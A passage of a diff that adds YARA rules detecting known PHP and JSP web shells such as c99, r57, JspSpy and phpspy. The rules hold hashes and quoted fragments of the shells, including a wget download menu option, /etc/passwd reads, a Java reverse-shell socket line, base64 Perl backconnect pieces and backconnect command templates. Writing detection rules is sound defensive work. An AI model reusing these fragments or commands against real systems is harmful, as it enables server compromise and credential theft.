+      hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+      hash2 = "56c005690da2558690c4aa305a31ad37"
+      hash3 = "532b93e02cddfbb548ce5938fe2f5559"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" " 
+      $s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR" 
+   condition: 
+      all of them
+}
+
+rule Webshell_JspSpyJDK51_luci_jsp_xxx_RID33CD : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects Web Shell from tennc webshell repo"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:03:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+      hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+      hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword
+      $s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_wso2_5_1_wso2_5_wso2_RID31BD : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:35:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"
+      hash2 = "cbc44fb78220958f81b739b493024688"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec" 
+      $s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na" 
+   condition: 
+      all of them
+}
+
+rule Webshell_QueryDong_spyjsp2010_t00ls_RID3421 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:17:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+      hash2 = "8b457934da3821ba58b06a113e0d53d9"
+      hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')" 
+      $s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\"" 
+   condition: 
+      all of them
+}
+
+rule Webshell_404_data_suiyue_RID303A : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:30:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+      hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+" 
+   condition: 
+      all of them
+}
+
+rule Webshell_r57shell_SnIpEr_EgY_SpIdEr_RID3416 : CRIME DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects Web Shell from tennc webshell repo"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:15:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ae025c886fbe7f9ed159f49593674832"
+      hash2 = "911195a9b7c010f61b66439d9048f400"
+      hash3 = "697dae78c040150daff7db751fc0c03c"
+      tags = "CRIME, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name" 
+      $s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1" 
+      $s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=" 
+   condition: 
+      all of them
+}
+
+rule Webshell_JspSpy_xxx_RID2ED6 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects Web Shell from tennc webshell repo"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:31:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "76037ebd781ad0eac363d56fc81f4b4f"
+      hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+      hash3 = "14e9688c86b454ed48171a9d4f48ace8"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\"<h2>Remote Control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var" 
+      $s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu" 
+      $s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i" 
+   condition: 
+      all of them
+}
+
+rule Webshell_JSP_MA_download_RID3037 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:30:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"
+      hash2 = "4cc68fa572e88b669bce606c7ace0ae9"
+      hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su" 
+      $s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but" 
+      $s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class=" 
+   condition: 
+      all of them
+}
+
+rule Webshell_JFolder_Leo_RID2ECB : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects Web Shell from tennc webshell repo"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:29:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+      hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+      hash3 = "36331f2c81bad763528d0ae00edf55be"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword
+      $s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_shell_phpspy_2006_arabicspy_RID3505 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:55:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "40a1f840111996ff7200d18968e42cfe"
+      hash2 = "e0202adff532b28ef1ba206cf95962f2"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype" 
+      $s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P" 
+   condition: 
+      all of them
+}
+
+rule Webshell_in_JFolder_jfolder01_jsp_leo_warn_RID378A : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 17:42:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8979594423b68489024447474d113894"
+      hash2 = "ec482fc969d182e5440521c913bab9bd"
+      hash3 = "f98d2b33cd777e160d1489afed96de39"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "sbFile.append(\"  &nbsp;<a href=\\\"javascript:doForm('down','\"+formatPath(strD" 
+      $s9 = "sbFile.append(\" &nbsp;<a href=\\\"javascript:doForm('edit','\"+formatPath(strDi" 
+   condition: 
+      all of them
+}
+
+rule Webshell_2_520_icesword_job_ma1_ma4_2_RID3477 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:31:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+      hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+      hash3 = "56c005690da2558690c4aa305a31ad37"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\"," 
+      $s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typ" 
+      $s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor" 
+   condition: 
+      all of them
+}
+
+rule Webshell_lite_PHPSPY_RID2E97 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:21:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+      hash2 = "0712e3dc262b4e1f98ed25760b206836"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma" 
+      $s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE" 
+      $s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; " 
+   condition: 
+      2 of them
+}
+
+rule Webshell_phpspy_arabicspy_RID3167 : DEMO SCRIPT T1007 T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:21:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "40a1f840111996ff7200d18968e42cfe"
+      hash2 = "e0202adff532b28ef1ba206cf95962f2"
+      hash3 = "802f5cae46d394b297482fd0c27cb2fc"
+      tags = "DEMO, SCRIPT, T1007, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname." 
+   condition: 
+      all of them
+}
+
+rule Webshell_C99_Shell_ci_Biz_RID3061 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects Web Shell from tennc webshell repo"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:37:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f2fa878de03732fbf5c86d656467ff50"
+      hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+      hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\"" 
+   condition: 
+      all of them
+}
+
+rule Webshell_2008_2009lite_2009mssql_RID31A2 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:30:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3f4d454d27ecc0013e783ed921eeecde"
+      hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');" 
+      $s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all" 
+   condition: 
+      all of them
+}
+
+rule Webshell_Arabicspy_PHPSPY_RID3087 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:43:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b68bfafc6059fd26732fa07fb6f7f640"
+      hash2 = "42f211cec8032eb0881e87ebdb3d7224"
+      hash3 = "40a1f840111996ff7200d18968e42cfe"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$mainpath_info           = explode('/', $mainpath);" fullword
+      $s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d" 
+   condition: 
+      all of them
+}
+
+rule Webshell_JspSpyJDK5_RID2E1D : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:00:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "14e9688c86b454ed48171a9d4f48ace8"
+      hash2 = "341298482cf90febebb8616426080d1d"
+      hash3 = "88fc87e7c58249a398efd5ceae636073"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword
+      $s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_Dive_Shell_Emperor_Hacking_Team_RID36B8 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 17:07:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f8a6d5306fb37414c5c772315a27832f"
+      hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals" 
+      $s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_JFolder_jfolder01_xxx_RID32B9 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 14:17:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+      hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+      hash3 = "8979594423b68489024447474d113894"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "&nbsp;<TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE" 
+   condition: 
+      all of them
+}
+
+rule Webshell_jsp_reverse_jsp_RID30FA : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:02:51"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ea87f0c1f0535610becadf5a98aca2fc"
+      hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword
+      $s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword
+      $s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_JFolder_jfolder01_jsp_leo_RID343D : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:22:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "793b3d0a740dbf355df3e6f68b8217a4"
+      hash2 = "8979594423b68489024447474d113894"
+      hash3 = "ec482fc969d182e5440521c913bab9bd"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "sbFolder.append(\"<tr><td >&nbsp;</td><td>\");" fullword
+      $s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword
+      $s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword
+      $s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2_RID369B : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 17:03:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+      hash2 = "56c005690da2558690c4aa305a31ad37"
+      hash3 = "70a0ee2624e5bbe5525ccadc467519f6"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword
+      $s6 = "password = (String)session.getAttribute(\"password\");" fullword
+      $s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx_RID39AE : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects Web Shell from tennc webshell repo"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 19:14:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ef43fef943e9df90ddb6257950b3538f"
+      hash2 = "ae025c886fbe7f9ed159f49593674832"
+      hash3 = "911195a9b7c010f61b66439d9048f400"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI" 
+      $s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC" 
+   condition: 
+      all of them
+}
+
+rule Webshell_PHPJackal_itsecteam_shell_RID3469 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 15:29:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e2830d3286001d1455479849aacbbb38"
+      hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+      hash3 = "40c6ecf77253e805ace85f119fe1cebb"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword
+      $s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|" 
+      $s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_Shell_Biz_c100_RID2F75 : DEMO SCRIPT T1087 T1100 T1105 WEBSHELL {
+   meta:
+      description = "Web Shell - from files Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c99-shadows-mod.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:58:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+      hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+      tags = "DEMO, SCRIPT, T1087, T1100, T1105, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri" 
+      $s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\"" 
+      $s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword
+      $s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de" 
+      $s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_NIX_REMOTE_WEB_SHELL_RID30D4 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:56:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f3ca29b7999643507081caab926e2e74"
+      hash2 = "527cf81f9272919bf872007e21c4bdda"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=" 
+      $s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword
+      $s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword
+      $s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_C99_w4cking_Shell_RID30C8 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects Web Shell from tennc webshell repo"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:54:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+      hash2 = "9c34adbc8fd8d908cbb341734830f971"
+      hash3 = "f2fa878de03732fbf5c86d656467ff50"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo \"<b>HEXDUMP:</b><nobr>" 
+      $s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword
+      $s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r" 
+      $s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB " 
+      $s8 = "echo \"<center><b>Server-status variables:</b><br><br>\";" fullword
+      $s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_phpspy_2006_arabicspy_RID328E : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 14:10:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "aa17b71bb93c6789911bd1c9df834ff9"
+      hash2 = "b68bfafc6059fd26732fa07fb6f7f640"
+      hash3 = "40a1f840111996ff7200d18968e42cfe"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$this -> addFile($content, $filename);" fullword
+      $s3 = "function addFile($data, $name, $time = 0) {" fullword
+      $s8 = "function unix2DosTime($unixtime = 0) {" fullword
+      $s9 = "foreach($filelist as $filename){" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_c99_c99shell_RID2EC7 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:29:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+      hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+      hash3 = "048ccc01b873b40d57ce25a4c56ea717"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv" 
+      $s3 = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
+      $s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66" 
+      $s7 = "   elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources" 
+      $s8 = "  \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos" 
+      $s9 = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!" 
+   condition: 
+      2 of them
+}
+
+rule Webshell_ok_style_1_JspSpy_RID3168 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:21:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d71716df5042880ef84427acee8b121e"
+      hash2 = "344f9073576a066142b2023629539ebd"
+      hash3 = "32dea47d9c13f9000c4c807561341bee"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
